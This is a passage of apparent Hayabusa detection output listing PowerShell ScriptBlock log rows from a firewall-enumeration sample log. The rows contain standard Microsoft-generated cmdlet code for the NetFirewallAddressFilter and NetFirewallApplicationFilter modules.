[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallAddressFilter' function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallAddressFilter'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<?xml version='1.0' encoding='utf-8'?> <PowerShellMetadata xmlns=""http://schemas.microsoft.com/cmdlets-over-objects/2009/11""> <Class ClassName=""root/standardcimv2/MSFT_NetApplicationFilter"" ClassVersion=""1.0.0""> <Version>1.0.0.0</Version> <DefaultNoun>NetFirewallApplicationFilter</DefaultNoun> <InstanceCmdlets> <GetCmdletParameters DefaultCmdletParameterSet=""GetAll""> <QueryableProperties> <Property PropertyName=""AppPath""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""Program"" CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""Package""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> </QueryableProperties> <QueryableAssociations> <Association Association=""MSFT_NetFirewallRuleFilterByApplication"" ResultRole=""PartComponent"" SourceRole=""GroupComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule""/> <CmdletParameterMetadata PSName=""AssociatedNetFirewallRule"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetFirewallRule""/> </AssociatedInstance> </Association> </QueryableAssociations> <QueryOptions> <Option OptionName=""All""> <Type PSType=""System.Management.Automation.SwitchParameter""/> <CmdletParameterMetadata CmdletParameterSets=""GetAll""/> </Option> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> <Cmdlet> <CmdletMetadata Verb=""Set"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:ModifyInstance""> <Parameters> <Parameter ParameterName=""AppPath""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Program""/> </Parameter> <Parameter ParameterName=""Package""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Package""/> </Parameter> </Parameters> </Method> <GetCmdletParameters> <QueryOptions> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> </Cmdlet> </InstanceCmdlets> </Class> </PowerShellMetadata>",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetApplicationFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] 